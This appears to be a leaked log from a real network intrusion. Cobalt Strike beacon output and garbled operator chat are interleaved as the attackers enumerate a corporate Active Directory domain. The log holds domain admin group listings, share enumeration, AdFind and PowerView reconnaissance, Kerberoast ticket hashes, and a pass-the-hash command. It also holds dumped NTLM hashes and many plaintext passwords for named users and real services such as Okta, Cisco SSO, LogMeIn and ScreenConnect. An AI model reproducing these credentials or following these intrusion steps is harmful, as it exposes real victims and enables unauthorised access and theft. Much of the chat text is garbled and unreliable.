JDOSSN/Sedona_CROPS_Admins
Remote Support
W08872612198
The command completed successfully.

``EA
```
[*] Tasked beacon to run: net group "enterprise admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain jdossn.local.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
The command completed successfully.

``DA
```
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
a900221 AuditDB_svc AuditJDOSSNDA
DHSAdmin jdodmp_svc MPXAXDAgentAccount
PAM_PRD_JDO_EQI_01 PAM_PRD_JDO_EQI_02 scom
svc_audit svc_BuildAutomator svc_exchange
svc_OMAA svc_OMDAS svc_OMREAD
svc_scomsql_2019 svc_snow_preprod
The command completed successfully.

``net accounts
```
Force user logoff how long after time expires?
Minimum password age (days): 1
Maximum password age (days): 84
Minimum password length: 10
Length of password history maintained: 24
Lockout threshold: 8
Lockout duration (minutes): Never
Lockout observation window (minutes): 15
Computer role: BACKUP
The command completed successfully.


I don't see anything about the correct domain, they haven't cleaned it out
i just renamed the confab. why did they clean it out? and can you tell me the name of the PC where you came from? epcusa.com i will pass it on somehow the domain is admin
it means you have to reopen it. current time2020-12-23, 00:42:57a
what about a day ago? it's more like a year ago2020-12-22, 01:01:54 what was on the net now I'll check it tell me what needs to be reopened
$krb5tgs$23$*spps2007$epctech.com$MSSQLSvc/SQLSRV03.epctech.com

``There don't seem to be any sessions expected, but I made it here.
$krb5tgs$23$*avman$epctech.com$MSSQLSvc/ Kaspersky2013

````somerd.com` live session here
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
televisa.com.mx
```
liveuser9okskin in ls, when he comes he will throw in the brututtorogi no timlid? to whom to give the hash?
\JDOXADIRC1.jdossn.local\ADMIN$ - Remote Admin
\JDOXADIRC1.jdossn.local\C$ - Default share
\JDOXADIRC1.jdossn.local\IPC$ - Remote IPC
\W088726111915.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W088726111915.ndleading.jdossn.local\C$ - Default share
\W088726111915.ndleading.jdossn.local\IPC$ - Remote IPC
\W088726111915.ndleading.jdossn.local\print$ - Printer Drivers
\W088726111915.ndleading.jdossn.local\Upstairs Printer - Upstairs Printer
\WW08872611194.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W08872611194.ndleading.jdossn.local\C$ - Default share
\W08872611194.ndleading.jdossn.local\IPC$ - Remote IPC
\WW08872611194.ndleading.jdossn.local\nic - nic
\WW08872611194.ndleading.jdossn.local\print$ - Printer Drivers
\\JDOFIEECONN01.jdossn.local/ADMIN$ - Remote Admin
\JDOFIEECONN01.jdossn.local\C$ - Default share
\JDOFIEECONN01.jdossn.local/IPC$ - Remote IPC
\JDOXADIRD1.jdossn.local/ADMIN$ - Remote Admin
\JDOXADIRD1.jdossn.local\C$ - Default share
\JDOXADIRD1.jdossn.local\IPC$ - Remote IPC
\JDOdc65.jdossn.local/ADMIN$ - Remote Admin
\JDOdc65.jdossn.local\C$ - Default share
\JDOdc65.jdossn.local\DealerConfig -
\JDOdc65.jdossn.local\EQAPP -
\JDOdc65.jdossn.local\EQDBBackup -
\JDOdc65.jdossn.local\EQPROF -
\JDOdc65.jdossn.local\EQUIPArchive -
\JDOdc65.jdossn.local\EQUIPAttachments -
\JDOdc65.jdossn.local\EQUIPREPORTS -
\JDOdc65.jdossn.local\HomeDirs -
\JDOdc65.jdossn.local\IPC$ - Remote IPC
\\Lockouts - Lockout logs
\JDOdc65.jdossn.local\MISCPROF -
\JDOdc65.jdossn.local\MXHomeDirs -
\JDOdc65.jdossn.local\MXShares -
\JDOdc65.jdossn.local\NETLOGON - Logon server share
\\Logon server share \JDOdc65.jdossn.local\SD -
\JDOdc65.jdossn.local/SDAttach -
\JDOdc65.jdossn.local/SDPROF -
\JDOdc65.jdossn.local\Shares -
\JDOdc65.jdossn.local\SYSVOL - Logon server share
\W08987711192.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W0W8987711192.ndleading.jdossn.local\C$ - Default share
\W0W8987711192.ndleading.jdossn.local\IPC$ - Remote IPC
\WW08987711192.ndleading.jdossn.local\NPI02DE8A (HP LaserJet 400 M401dne) - NPI02DE8A (HP LaserJet 400 M401dne)
\\{\W08987711192.ndleading.jdossn.local\print$ - Printer Drivers
\W0W8987711192.ndleading.jdossn.local\TJ NEW HP Color LaserJet Pro M478f-9f PCL-6 (V4) - HP Color LaserJet Pro M478f-9f PCL-6 (V4)

``D33r3123``
aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee
``````
dn:CN=Administrators,CN=Builtin,DC=jdossn,DC=local
>objectClass: top
>objectClass: group
>cn: Administrators
>description: Administrators have complete and unrestricted access to the computer/domain
>member: CN=VMjoinJDOSSN Group,OU=VM Clone Customization,OU=Service Accounts,DC=jdossn,DC=local
>member: CN=a900221,OU=Patrol,OU=Service Accounts,DC=jdossn,DC=local
>member: CN=Operations_All_Users,OU=Groups,OU=Operations,OU=JDIS,DC=jdossn,DC=local
>member: CN=CAG,OU=Citrix,OU=Service Accounts,DC=jdossn,DC=local
>member: CN=Enterprise Admins,CN=Users,DC=jdossn,DC=local
>member: CN=Domain Admins,CN=Users,DC=jdossn,DC=local
>member: CN=DHSAdmin,CN=Users,DC=jdossn,DC=local
``````
https://cloudsso.cisco.com/,https://cloudsso.cisco.com/sp/startSSO.ping,7/27/2018 11:23:30 AM,13177182210062277,nicd@leadingedgeequip.com,vgy7vgy7VGY
 
``Microadmin.
```
	 * Username : ndmicdgeorg
	 * Domain : JDOSSN
	 * NTLM : 053a03895fad0c33bb088137941ec5bc
	 * SHA1 : 27f1f87e2764ab71e5c971af2119f9750b2e01c0
	 * DPAPI : 57c9711ddeb916f0bce56ce6f6fe6a
``````
http://directwi.jdossn.local/,http://directwi.jdossn.local/Citrix/XenAppDirectWI/auth/login.aspx,5/30/2017 12:20:27 PM,13140638427060024,ndcarddalma,bhu8bhu8

``````
* Username : ndmictrobin
	 * Domain : JDOSSN
	 * NTLM : 23a7ccf40635bc590c3c98dbeed94e01
	 * SHA1 : b2907d5a9d75a60ddcb5ac994c26f5c567d83db2
``````
https://account.activedirectory.windowsazure.com/,https://account.activedirectory.windowsazure.com/ChangePassword.aspx,4/30/2019 10:30:51 AM,13201111851838636,,sWKwEcC2T:Gq62X
``````
https://sso.cisco.com/,https://sso.cisco.com/autho/forms/CDClogin.html,7/30/2018 9:01:24 AM,13177432884691813,nicd@leadingedgeequip.com,vgy7vgy7VGY

``````
	 [00000003] Primary
	 * Username : ndmictflana
	 * Domain : JDOSSN
	 * NTLM : 7bba5ae0ee513a322b7cf6b8768bb063
	 * SHA1 : 758182c25f76e6b83dbdaba52642e49326f558d9
``````
https://iduiaas.cloudapps.cisco.com/,https://iduiaas.cloudapps.cisco.com/web/registrationForm,7/27/2018 11:18:23 AM,13177181903702855,nicd@leadingedgeequip.com,vgy7vgy7VGY

``Go to the domain itself mb there redirect different, there since 2014 access is preserved) go to the full link? Well, it still does not work to the fact that it itself is external and I do not know whether through it to go to the domainada neti from outside do not go it is an external citra? 2fa
```
https://leadingedgeequip.screenconnect.com/Login,4/12/2020 10:11:37 PM,13231221097720457,blainee@leadingedgeequip.com,NDleading2020$
``[ ](https://mediaeveryone.com/group/snpartners-com?msg=TL63esuKb3YtfHDKq) doesn't go to the link, not even under the proxy of the machine you took it out of ``.
https://w08041911191-ndleading-jdossn-local-wocqspajes.app01-17.logmein.com/,5/1/2020 3:42:22 PM,13232839342283382,nddevbernst,Nrb11232010!

``````
https://micservice190-ndleading-jdossn-local-arzkebwqmq.lmi-app14-01.logmein.com/,10/20/2020 11:15:16 AM,13247684116208716,nddevbernst,NDleading2021!

``````
https://identity.webrootanywhere.com/,https://identity.webrootanywhere.com/v1/Account/login,3/16/2020 3:54:55 PM,13228865695219331,blainee@leadingedgeequip.com,ShadowFox5640!
 
https://johndeere.okta.com/,https://johndeere.okta.com/login/login.htm,3/13/2020 2:09:15 PM,13228600155038654,X096743,Nrb11232010!
 
https://desktop-0bog84e-mlppczciax.app12-08.logmein.com/,https://desktop-0bog84e-mlppczciax.app12-08.logmein.com/,2/5/2020 11:22:52 AM,13225396972110903,nddevbernst,mko0MKO)mko0MKO)
 
https://leadingedgeequip.screenconnect.com/Login,4/12/2020 10:11:37 PM,13231221097720457,blainee@leadingedgeequip.com,NDleading2020$
 
https://w08041912191-hewsstpmaj.app12-11.logmein.com/,https://w08041912191-hewsstpmaj.app12-11.logmein.com/,4/29/2020 8:54:24 AM,13232642064233077,nddevbernst,Nrb11232010!
 
https://reports.secureexchange.net/,https://reports.secureexchange.net/admin/login.aspx,4/29/2020 3:26:37 PM,13232665597610069,PARTS100,Parts100
 
https://reports.secureexchange.net/,https://reports.secureexchange.net/admin/login.aspx,5/1/2020 10:48:43 AM,13232821723796642,devi201,Deere100
 
https://desktop-0bog84e-cmilwzrpyj.app01-22.logmein.com/,https://desktop-0bog84e-cmilwzrpyj.app01-22.logmein.com/,8/26/2020 7:41:36 AM,13242919296305003,nddevbernst,Combine20!

``As long as he's caught with Citrix, try to get started too,`` by the way.
https://remotedesktop.google.com/,https://remotedesktop.google.com/access,8/27/2019 5:48:39 PM,13211419719369994,Blaine Home PC,11232010
``````
https://res.cisco.com/websafe/register,12/29/2016 10:16:37 AM,13127501797078616,Ernst,Jibs5640

``````
https://heritage-webapps.cvty.com/Citrix/Heritage-XenApp/auth/login.aspx,5/21/2014 7:11:20 AM,13045147880000000,A579851,oneway$5
``````
	 * Username : nddevbernst
	 * Domain : JDOSSN
	 * NTLM : 5b622ad5d550408ed6260c2b8fb185cc
	 * Password : Tractor20!

	 * Username : nddevkodell
	 * Domain : JDOSSN
	 * NTLM : 8de4a768f02760e576c5a5bb59c97771
 
	 * Username : nddeviowlbo
	 * Domain : JDOSSN
	 * NTLM : 4fd547943802ebb200777a443d3b06a4
	 * Password : NDspring2020
``````
\JDOXADCD3.jdossn.local\ADMIN$ - Remote Admin
\JDOXADCD3.jdossn.local\C$ - Default share
\JDOXADCD3.jdossn.local\CtxSTShare -
\JDOXADCD3.jdossn.local\IPC$ - Remote IPC

``Check yet and it's not forbidden here``.
beacon> shell wmic /node:10.28.92.159 OS GET Name
[*] Tasked beacon to run: wmic /node:10.28.92.159 OS GET Name
[+] host called home, sent: 66 bytes
[+] received output:
Node - 10.28.92.159

ERROR:

Description = The RPC server is unavailable.
\W080332420b ndleading jdossn local\ADMIN$ - Remote Admin
\W080332420b.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W080332420b.ndleading.jdossn.local\C$ - Default share
\W080332420b.ndleading.jdossn.local\D$ - Default share
\W080332420b.ndleading.jdossn.local\IPC$ - Remote IPC
\W080332420b.ndleading.jdossn.local\Nic's Printer - Nic's Printer
\W080332420b.ndleading.jdossn.local\print$ - Printer Drivers
\W0W80332420b.ndleading.jdossn.local\Upstairs MFP M477 PCL 6 - Upstairs MFP M477 PCL 6
\\W080332420b.ndleading.jdossn.local\Users -
``or access to the rps service in general the admin ball should indicate the possibility of using the vmik utility and he just spit and spit them slowly still in the lab I remember how to run not glance at the sharpshare looks sharpsharefinder gives results already after the full completion of the scan so it's like sharpshare not in my processes so it's spit out noo sharfinder I ran it without output to a file not hashdump not do mimic not output under the system the session is nuts I don't know what it even is or still not working it's still working but I xvorvor it's sharfinder
 JID PID Description
 --- --- -----------
 51 72412 process
 52 218268 process
 74,996 PowerShell (Unmanaged)
``in johns* yesterday SharpShares was hanging in the processes I don't know what of it SharpShares saw admin balls there? and yesterday it didn't spit out these balls came now ShareFinder yesterday I used SharpShares before weekend at all low grade scans no[ ](https://mediaeveryone.com/group/snpartners-com?msg=7BD3u87LJ9Rfyu3Nf) 1[ ](https://mediaeveryone.com/group/snpartners-com?msg=gNjQhyMhNFSrXhBXx) - then to question above ``
beacon> shell dir \\10.28.92.159\ADMIN$
[*] Tasked beacon to run: dir \\10.28.92.159\ADMIN$
[+] host called home, sent: 56 bytes
[+] received output:
Access is denied.

``I still have a list of folders in admin ball?`` I immediately did "copy" on accessibility in the plan? how did you check the balls? but when I copy the case - Access is deleted then daon sees them how? on the ball for some reason it is not allowed in the subnet other than under that polzak above? there are many admin ball?
[+] received output:
\JDODHCP02.jdossn.local\ADMIN$ - Remote Admin
\JDODHCP02.jdossn.local\C$ - Default share
\JDODHCP02.jdossn.local\IPC$ - Remote IPC

[+] received output:
\tannerflanigan.ndleading.jdossn.local\ADMIN$ - Remote Admin
\tannerflanigan.ndleading.jdossn.local\C$ - Default share
\tannerflanigan.ndleading.jdossn.local\IPC$ - Remote IPC
\tannerflanigan.ndleading.jdossn.local\NPI602973 (HP LaserJet 400 M401dne) - Back Shop
\tannerflanigan.ndleading.jdossn.local\print$ - Printer Drivers

[+] received output:
\\JDOSQLEAST1C.jdossn.local\ADMIN$ - Remote Admin
\JDOSQLEAST1C.jdossn.local\C$ - Default share
\JDOSQLEAST1C.jdossn.local\E$ - Default share
\JDOSQLEAST1C.jdossn.local\G$ - Default share
\JDOSQLEAST1C.jdossn.local/IPC$ - Remote IPC
\JDOSQLEAST1C.jdossn.local\J$ - Default share
\JDOSQLEAST1C.jdossn.local\M$ - Default share
\JDOSQLEAST1C.jdossn.local/Q$ - Default share
\JDOSQLEAST1C.jdossn.local\T$ - Default share
\JDOSQLEAST1C.jdossn.local\V$ - Default share

[+] received output:
\W0W8987711192.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W0W8987711192.ndleading.jdossn.local\C$ - Default share
\W0W8987711192.ndleading.jdossn.local\IPC$ - Remote IPC
\WW08987711192.ndleading.jdossn.local\NPI02DE8A (HP LaserJet 400 M401dne) - NPI02DE8A (HP LaserJet 400 M401dne)
\\{\W08987711192.ndleading.jdossn.local\print$ - Printer Drivers
\W0W8987711192.ndleading.jdossn.local\TJ NEW HP Color LaserJet Pro M478f-9f PCL-6 (V4) - HP Color LaserJet Pro M478f-9f PCL-6 (V4)

[+] received output:
\\JDODC61.jdossn.local\ADMIN$ - Remote Admin
\JDODC61.jdossn.local\C$ - Default share
\JDODC61.jdossn.local/IPC$ - Remote IPC
\JDODC61.jdossn.local/Lockouts -
\JDODC61.jdossn.local/NETLOGON - Logon server share
\JDODC61.jdossn.local\SYSVOL - Logon server share

[+] received output:
\JDOXADIRC1.jdossn.local\ADMIN$ - Remote Admin
\JDOXADIRC1.jdossn.local\C$ - Default share
\JDOXADIRC1.jdossn.local\IPC$ - Remote IPC

[+] received output:
\\JDODHCP04.jdossn.local\ADMIN$ - Remote Admin
\JDODHCP04.jdossn.local\C$ - Default share
\JDODHCP04.jdossn.local\IPC$ - Remote IPC

[+] received output:
\DESKTOP-GCPB49A.ndleading.jdossn.local\ADMIN$ - Remote Admin
\DESKTOP-GCPB49A.ndleading.jdossn.local\C$ - Default share
\DESKTOP-GCPB49A.ndleading.jdossn.local\D$ - Default share
\DESKTOP-GCPB49A.ndleading.jdossn.local\IPC$ - Remote IPC
\DESKTOP-GCPB49A.ndleading.jdossn.local/NPI7CF108 (HP Color LaserJet MFP M477fdw) - NPI7CF108 (HP Color LaserJet MFP M477fdw)
\DESKTOP-GCPB49A.ndleading.jdossn.local\print$ - Printer Drivers

[+] received output:
\W0887261216KO.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W0W887261216KO.ndleading.jdossn.local\C$ - Default share
\W0W887261216KO.ndleading.jdossn.local\D$ - Default share
\W0W887261216KO.ndleading.jdossn.local\E$ - Default share
\W0W887261216KO.ndleading.jdossn.local\IPC$ - Remote IPC
\W0887261216KO.ndleading.jdossn.local\print$ - Printer Drivers

[+] received output:
\\JDOdc65.jdossn.local\ADMIN$ - Remote Admin
\JDOdc65.jdossn.local\C$ - Default share
\JDOdc65.jdossn.local\DealerConfig -
\JDOdc65.jdossn.local\EQAPP -
\JDOdc65.jdossn.local\EQDBBackup -
\JDOdc65.jdossn.local\EQPROF -
\JDOdc65.jdossn.local\EQUIPArchive -
\JDOdc65.jdossn.local\EQUIPAttachments -
\JDOdc65.jdossn.local\EQUIPREPORTS -
\JDOdc65.jdossn.local\HomeDirs -
\JDOdc65.jdossn.local\IPC$ - Remote IPC
\\Lockouts - Lockout logs
\JDOdc65.jdossn.local\MISCPROF -
\JDOdc65.jdossn.local\MXHomeDirs -
\JDOdc65.jdossn.local\MXShares -
\JDOdc65.jdossn.local\NETLOGON - Logon server share
\\Logon server share \JDOdc65.jdossn.local\SD -
\JDOdc65.jdossn.local/SDAttach -
\JDOdc65.jdossn.local/SDPROF -
\JDOdc65.jdossn.local\Shares -
\JDOdc65.jdossn.local\SYSVOL - Logon server share

[+] received output:
\\Jdodc51.jdossn.local\ADMIN$ - Remote Admin
\Jdodc51.jdossn.local\C$ - Default share
\Jdodc51.jdossn.local\D$ - Default share
\\Jdodc51.jdossn.local\F$ - Default share
\Jdodc51.jdossn.local\IPC$ - Remote IPC
\Jdodc51.jdossn.local/Lockouts -
\Jdodc51.jdossn.local/NETLOGON - Logon server share
\\{\Jdodc51.jdossn.local\print$ - Printer Drivers
\Jdodc51.jdossn.local\SYSVOL - Logon server share

[+] received output:
\DNDMIC61.jdossn.local\ADMIN$ - Remote Admin
\DNDMIC61.jdossn.local\C$ - Default share
\DNDMIC61.jdossn.local\IPC$ - Remote IPC

[+] received output:
\\JDOSQLEAST1D.jdossn.local\ADMIN$ - Remote Admin
\JDOSQLEAST1D.jdossn.local\C$ - Default share
\JDOSQLEAST1D.jdossn.local\E$ - Default share
\JDOSQLEAST1D.jdossn.local\G$ - Default share
\JDOSQLEAST1D.jdossn.local/IPC$ - Remote IPC
\JDOSQLEAST1D.jdossn.local\J$ - Default share
\JDOSQLEAST1D.jdossn.local\M$ - Default share
\JDOSQLEAST1D.jdossn.local/Q$ - Default share
\JDOSQLEAST1D.jdossn.local\T$ - Default share
\JDOSQLEAST1D.jdossn.local\V$ - Default share

[+] received output:
\JDOXADCC3.jdossn.local\ADMIN$ - Remote Admin
\JDOXADCC3.jdossn.local\C$ - Default share
\JDOXADCC3.jdossn.local\CtxSTShare -
\JDOXADCC3.jdossn.local\IPC$ - Remote IPC

[+] received output:
\JDOXADIRD1.jdossn.local\ADMIN$ - Remote Admin
\JDOXADIRD1.jdossn.local\C$ - Default share
\JDOXADIRD1.jdossn.local\IPC$ - Remote IPC

[+] received output:
\jdopbi01.jdossn.local\ADMIN$ - Remote Admin
\jdopbi01.jdossn.local\C$ - Default share
\jdopbi01.jdossn.local\IPC$ - Remote IPC

[+] received output:
\KNDMICEQRD61.jdossn.local\ADMIN$ - Remote Admin
\KNDMICEQRD61.jdossn.local\ASAData -
\KNDMICEQRD61.jdossn.local\ASALogs -
\KNDMICEQRD61.jdossn.local\Backups -
\KNDMICEQRD61.jdossn.local\C$ - Default share
\KNDMICEQRD61.jdossn.local\E$ - Default share
\KNDMICEQRD61.jdossn.local\G$ - Default share
\KNDMICEQRD61.jdossn.local\IPC$ - Remote IPC
\KNDMICEQRD61.jdossn.local\L$ - Default share
\KNDMICEQRD61.jdossn.local\M$ - Default share
\KNDMICEQRD61.jdossn.local\MirrorLogs -
\KNDMICEQRD61.jdossn.local\P$ - Default share
\KNDMICEQRD61.jdossn.local\SQLRemote -
\KNDMICEQRD61.jdossn.local\T$ - Default share
\KNDMICEQRD61.jdossn.local\Temp -

[+] received output:
\\JDODC69.jdossn.local\ADMIN$ - Remote Admin
\JDODC69.jdossn.local\C$ - Default share
\JDODC69.jdossn.local\IPC$ - Remote IPC
\JDODC69.jdossn.local/lockouts -
\JDODC69.jdossn.local/NETLOGON - Logon server share
\JDODC69.jdossn.local\SYSVOL - Logon server share

[+] received output:
\\JDODC64.jdossn.local\ADMIN$ - Remote Admin
\JDODC64.jdossn.local\C$ - Default share
\JDODC64.jdossn.local\DealerConfig -
\JDODC64.jdossn.local\EQAPP -
\JDODC64.jdossn.local\EQDBBackup -
\JDODC64.jdossn.local\EQPROF -
\JDODC64.jdossn.local\EQUIPArchive -
\JDODC64.jdossn.local\EQUIPAttachments -
\JDODC64.jdossn.local\EQUIPREPORTS -
\JDODC64.jdossn.local\HomeDirs -
\JDODC64.jdossn.local\IPC$ - Remote IPC
\JDODC64.jdossn.local/lockouts -
\JDODC64.jdossn.local\MISCPROF -
\JDODC64.jdossn.local\MXHomeDirs -
\JDODC64.jdossn.local\MXShares -
\JDODC64.jdossn.local\NETLOGON - Logon server share
\\JDODC64.jdossn.local/SD
\\SD - SDAttach - SDAttach - SDAttach.
\JDODC64.jdossn.local/SDPROF -
\JDODC64.jdossn.local\Shares -
\JDODC64.jdossn.local\SYSVOL - Logon server share

[+] received output:
\JDOXADCC1.jdossn.local\ADMIN$ - Remote Admin
\JDOXADCC1.jdossn.local\C$ - Default share
\JDOXADCC1.jdossn.local\CtxSTShare -
\JDOXADCC1.jdossn.local\IPC$ - Remote IPC

[+] received output:
\SNDMIC61.jdossn.local\ADMIN$ - Remote Admin
\SNDMIC61.jdossn.local/APPS - EQUIP APPS Share
\SNDMIC61.jdossn.local\AUTO-IT - EQUIP AUTO-IT Share
\SNDMIC61.jdossn.local\C$ - Default share
\SNDMIC61.jdossn.local\DPM - EQUIP DPM Share
\SNDMIC61.jdossn.local/DSJDIS -
\SNDMIC61.jdossn.local\EPC - EQUIP EPC Share
\SNDMIC61.jdossn.local\EQUIP - EQUIP EQUIP Share
\SNDMIC61.jdossn.local/IPC$ - Remote IPC
\SNDMIC61.jdossn.local/JDDTF - EQUIP JDDTF Share
\SNDMIC61.jdossn.local/SDDigitalSignature -
\SNDMIC61.jdossn.local\Units_Data - EQUIP Units_Data Share

[+] received output:
\\JDOCHOPS12.jdossn.local\ADMIN$ - Remote Admin
\JDOCHOPS12.jdossn.local\C$ - Default share
\JDOCHOPS12.jdossn.local\E$ - Default share
\JDOCHOPS12.jdossn.local\IPC$ - Remote IPC

[+] received output:
\W0W8987711191.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W0W8987711191.ndleading.jdossn.local\C$ - Default share
\W0W8987711191.ndleading.jdossn.local\dominics - dominics
\W0W8987711191.ndleading.jdossn.local\IPC$ - Remote IPC
\W0W8987711191.ndleading.jdossn.local\print$ - Printer Drivers

[+] received output:
\W088726121926.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W088726121926.ndleading.jdossn.local\C$ - Default share
\W088726121926.ndleading.jdossn.local\D$ - Default share
\W088726121926.ndleading.jdossn.local\IPC$ - Remote IPC
\W088726121926.ndleading.jdossn.local\Nic's Printer - Nic's Printer
\W088726121926.ndleading.jdossn.local\print$ - Printer Drivers
\W0W88726121926.ndleading.jdossn.local\Upstairs MFP M477 PCL 6 - Upstairs MFP M477 PCL 6
\\W088726121926.ndleading.jdossn.local\Users -

[+] received output:
\JDOXADCC2.jdossn.local\ADMIN$ - Remote Admin
\JDOXADCC2.jdossn.local\C$ - Default share
\JDOXADCC2.jdossn.local\CtxSTShare -
\JDOXADCC2.jdossn.local\IPC$ - Remote IPC

[+] received output:
\KNDMICEQDB61.jdossn.local\ADMIN$ - Remote Admin
\KNDMICEQDB61.jdossn.local\ASAData -
\KNDMICEQDB61.jdossn.local\ASALogs -
\KNDMICEQDB61.jdossn.local\ASATestData -
\KNDMICEQDB61.jdossn.local\Backups -
\KNDMICEQDB61.jdossn.local\C$ - Default share
\KNDMICEQDB61.jdossn.local\E$ - Default share
\KNDMICEQDB61.jdossn.local\F$ - Default share
\KNDMICEQDB61.jdossn.local\G$ - Default share
\KNDMICEQDB61.jdossn.local\IPC$ - Remote IPC
\KNDMICEQDB61.jdossn.local\L$ - Default share
\KNDMICEQDB61.jdossn.local\M$ - Default share
\KNDMICEQDB61.jdossn.local\MirrorLogs -
\KNDMICEQDB61.jdossn.local\P$ - Default share
\KNDMICEQDB61.jdossn.localSQLRemote -
\KNDMICEQDB61.jdossn.local\T$ - Default share
\KNDMICEQDB61.jdossn.local\Temp -
```pth JDOSSN\nddevbernst 5b622ad5d550408ed6260c2b8fb185cc```
dhsawspilot01.jdossn.local [10.99.194.150]
W088726121943.ndleading.jdossn.local [10.28.92.159]
JDOAWSSUP01.jdossn.local [10.99.207.196]
W08987712192.ndleading.jdossn.local [10.29.220.125]
``````
[+] received output:
\dhsawspilot01.jdossn.local\ADMIN$ - Remote Admin
\dhsawspilot01.jdossn.local\C$ - Default share
\dhsawspilot01.jdossn.local\E$ - Default share
\dhsawspilot01.jdossn.local\IPC$ - Remote IPC

[+] received output:
\W088726121943.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W088726121943.ndleading.jdossn.local\C$ - Default share
\W088726121943.ndleading.jdossn.local\Caseys - Caseys
\W088726121943.ndleading.jdossn.local\D$ - Default share
\W088726121943.ndleading.jdossn.local\IPC$ - Remote IPC
\W088726121943.ndleading.jdossn.local\print$ - Printer Drivers

[+] received output:
\\JDOAWSSUP01.jdossn.local\ADMIN$ - Remote Admin
\JDOAWSSUP01.jdossn.local\C$ - Default share
\JDOAWSSUP01.jdossn.local\D
\JDOAWSSUP01.jdossn.local\D$ - Default share
\JDOAWSSUP01.jdossn.local\E$ - Default share
\JDOAWSSUP01.jdossn.local\IPC$ - Remote IPC

[+] received output:
\W0W8987712192.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W0W8987712192.ndleading.jdossn.local\C$ - Default share
\W0W8987712192.ndleading.jdossn.local\D$ - Default share
\WW08987712192.ndleading.jdossn.local\HP LaserJet Pro MFP M426f-M427f PCL-6 - HP LaserJet Pro MFP M426f-M427f PCL-6
\W0W8987712192.ndleading.jdossn.local\IPC$ - Remote IPC
\WW08987712192.ndleading.jdossn.local\MS Publisher Color Printer - MS Publisher Color Printer
\W0W8987712192.ndleading.jdossn.local\print$ - Printer Drivers
````AdFind -b "OU=NewYork,DC=Contoso,DC=com" -s one -dn`
there's an example belowhttp://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
above from here as in a hurry understood the format DC=server,DC=comkey-b parameter``
shell adfind.exe -f "(objectcategory=person)" -s base > ad_users.txt
``base where do I put it?
C:\Users\Administrator\Desktop\ping>adfind.exe -f "(objectcategory=person)" 1>ad_users.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.

C:\Users\Administrator\Desktop\ping>adfind.exe -f "objectcategory=computer" 1>ad_computers.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.

C:\Users\Administrator\Desktop\ping>adfind.exe -f "(objectcategory=organizationalUnit)" 1>ad_ous.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.

C:\Users\Administrator\Desktop\ping>adfind.exe -subnets -f (objectCategory=subnet) 1>subnets.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.

C:\Users\Administrator\Desktop\ping>adfind.exe -f "(objectcategory=group)" 1>ad_group.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.

C:\Users\Administrator\Desktop\ping>adfind.exe -gcb -sc trustdmp 1>trustdmp.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program
``You still have 4 minutes to google if you don't, google if you specify basea adfain won't work under token I wonder? no password length not lockoutaokay analog of net accounts in powerview how to get it?``The other thing)``

Unicode : @{Unicode=yes}
SystemAccess : @{RequireLogonToChangePassword=0; ForceLogoffWhenHourExpire=0}
KerberosPolicy : @{MaxTicketAge=10; MaxRenewAge=7; MaxServiceAge=600; MaxClockSkew=5;
                  TicketValidateClient=1}
Version : @{signature="$CHICAGO$"; Revision=1}
PrivilegeRights : @{SeBatchLogonRight=System.Object[];
                  SeLoadDriverPrivilege=*S-1-5-21-742535178-4155275036-2790254320-513}
EventAudit : @{AuditDSAccess=1}
RegistryValues :
Path : \\matches.com\sysvol\matches.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\
                  MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
GPOName : {31B2F340-016D-11D2-945F-00C04FB984F9}
GPODisplayName : Domain - Default Domain Policy
````MATCHES\Louisad M@tches2020!!!`
`MATCHES\mercedesd Dinham2323 `in jobs vicito works now made Louise's token, requested DomainPolicy to conf conf8 min for this all-cocken should start.[ ](https://mediaeveryone.com/group/matches?msg=BjGADji9jwnSK3pjt) now doing@tl1 aha, true token domain user tried? authorization vpn goes through radius rather than directly through hell, understand?
you're accessing a pc that DOES NOT KNOW about the domain from the context of a user who is NOT in the domain-seek a way to access with the domain tokens in the fuck - OFFICE - give me another 1000 messages
why the fuck don't you say something?
didn't get it - the office - who got it? no one fucking got it
so write 100,000,000 messages here.
I already explained it to you.
why the fuck do i have to go through this again and explain to you now you can't run it from a domain user because your machine isn't joined to a domain+1''.
[*] 10/03 18:17:46 - Executing PowerView Get-DomainPolicyData via PowerPick
[*] Tasked beacon to run: Get-DomainPolicyData -Domain matches.com (unmanaged)
[+] host called home, sent: 133715 bytes
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or
ERROR: could not be contacted.
ERROR: "
ERROR: At line:13117 char:24
ERROR: + else { $Results = $GPOSearcher.FindAll() }
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : COMException
ERROR:

